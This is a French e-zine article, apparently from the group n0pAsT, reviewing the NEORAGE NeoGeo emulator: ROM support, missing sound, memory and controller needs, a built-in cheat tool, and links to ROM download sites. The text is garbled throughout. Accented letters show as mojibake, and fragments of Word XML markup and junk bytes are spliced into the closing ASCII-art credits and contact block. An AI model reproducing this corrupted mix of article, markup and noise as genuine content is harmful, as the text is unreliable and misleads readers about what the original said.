fle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 des sa premiere version, il faisait tourner la totalit� des roms dispo sur le web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t maintenant, il est en a sa version 0.2d qui supporte toutes les roms sortie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je peux vous dire qu'il y en a plus de 80 disponibles ! Et si :) c'est chau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tout que la moyenne de sorti est de 1 a 2 nouvelles roms par semaine :) alors viv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l�chargement :) Pkoi ? Parce que la plus petite des roms prend 1 mo (ce qui n'est pas bcp)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lus grosse prend 26 MO !!! (pour l'instant) alors quelques heures de telechargement ne fais pas de mal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'est ce que l'on peut trouver comme rom dessus ? Tous les jeux NEOGEO :) comme Fatal Fury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ourai Showdown et tous les super jjeux qui ont fait le succes de cette console :) (Magic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, Baseball Star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oint faible de cet emulateur miracle, c'est qu'il n'a pas de son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H !!!!!!!!!!!!!!!!!! C'est pas cool :( Mais ne vous inqui�tez pas, car les petits ga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E bossent comme des durs (bref comme nous :) pour nous sortir l'emulateur de la mort qui t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sons !! et sans ralentissement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 plus chaud aussi reste aussi la ram ! Oubliez le lancement de gros jeux sur 16 MO,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queriez de planter votre becane ou le jeu ne se lancera pas du tout, vous pouvez tenter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MO mais le kif est a partir de 64 voire 128 MO avec des jeux genre Real Bout Fatal Fur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 tueur des Fatal Fury qui demande 60 mo pour etre lancer ! et plus quand NEORAGE prendr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le so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clavier est pas genial pour jouer, mieux vaut vous procurer une manette avec 4 bout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saye de trouver une manette arcade pour retrouver toutes les sensations du jeu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plus , l'emulateur integre un GameGenie pour pouvoir tricher sur vos jeux pr�f�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vec le nouveau BIOS made by Kiwi_slt). Bien sur, l'emulateur est enti�rement paramet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e au clavier, joypad, type d'affichage, sans ou avec scanlines) sais prendre des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ecran lors du jeu.... Bref tout ce que fais un emulateur digne de ce no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KeLkeS b0n LiEns...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�����������������������\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f si je vous ai fais bave, vous pouvez trouver plein d'infos sur NEORAGE ic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home5.swipnet.se/~w-50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pour trouver toutes les roms, vous pouvez aller chez dav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ttp://www.davesclassi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pour avoir les derni�res news en mati�re de roms NEOGE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ttp://hem.passagen.se/ogg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: Ah oui, n'oubliez pas de vous procurer DOS4GW.EXE pour lancer l'emulateur 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 au prochain num�ro, j'attaque avec l'emulateur CALLUS pour jeux CAPCOM et aussi un v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u de MA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+ et bonne emu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-�����������������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>桢��� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-�����������������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>桢��� ������������ ����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_                                      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 || |         __    ____ ______          | || _|aLiAs: NaTuRaL KiLLeR / ++nk / L�N�T�K /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 |______  |  |   \__/|  ___/ __  ___  | |||  pLaCe: 0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| |\____ \ |  |    __ |  __/ |  |/   \ | |||  r0Les: c0nCepTi0n, miSe en oEuvRe, rEdAcTi0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||| |/  __  ||  |___|  ||    | |    _   || |||_ c0nTacTs: UiN: 86293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||_|\______/\_____/|__|\_____\|____|___||_||__|         mAiL: NKHC@HoTmaiL.c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]|aLiEn|[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����������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>桢��� �������������������������桢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&lt;\________________________/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    ~~    ~~    ~~    ~~����     �&lt;����$T�T��m&gt;?    ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>غ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~    ~~    ~~    ~~    ~~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    ~~    ~~    ~~    ~~    ~-&lt;/������������������������\&gt;-~    ~~    ~~    ~~    ~~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    ~~    ~~    ~~    ~~    ~~http://n0past.cjb.net  ~~    ~~    ~~    ~~    ~~    ~~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    ~~    ~~  http://n0pAsT.home.ml.org  ...  http://www.chez.com/n0pAsT    ~~    ~~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    ~~    ~~    ~~  n0past@chez.com ....... n0past@altern.org   ~~    ~~    ~~    ~~    ~~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    ~~    ~~    ~~    ~~    ~~    n0past@hotmail.com~~    ~~    ~~    ~~    ~~    ~~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    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~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    ~~    ~~    ~~    ~~   et bien s�r : #n0pAsT sur uNdErNeT  ~~    ~~    ~~    ~~    ~~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    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    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